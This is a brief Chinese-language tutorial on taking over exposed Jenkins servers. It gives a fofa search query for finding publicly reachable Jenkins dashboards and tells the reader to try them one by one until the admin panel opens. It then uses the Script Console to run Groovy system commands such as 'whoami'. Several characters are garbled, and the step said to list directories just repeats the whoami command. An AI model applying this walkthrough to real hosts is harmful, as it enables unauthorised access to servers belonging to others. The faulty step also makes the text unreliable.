默認情況下 Jenkins面板中用戶可以選擇執(zhí)行腳本界面來操作一些系統(tǒng)層命令，攻擊者可通過未授權訪問漏洞或者暴力破解用戶密碼等進入后臺管理服務，通過腳本執(zhí)行界面從而獲取服務器權限。

第一步：使用fofa語句搜索

搜索語句：

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

一個一個搜索，直到出現(xiàn) Manage Jenkins，在打開的URL中...點擊 Manage Jenkins
Scritp Console 再執(zhí)行以下命令.

第二步：點進去后，頁面往下翻看到Scritp Console——點擊。

、

第三步：執(zhí)行命令，查看當前用戶名

println "whoami".execute().text

如下圖就是執(zhí)行中

第四步：執(zhí)行命令，查看目錄

println "whoami".execute().text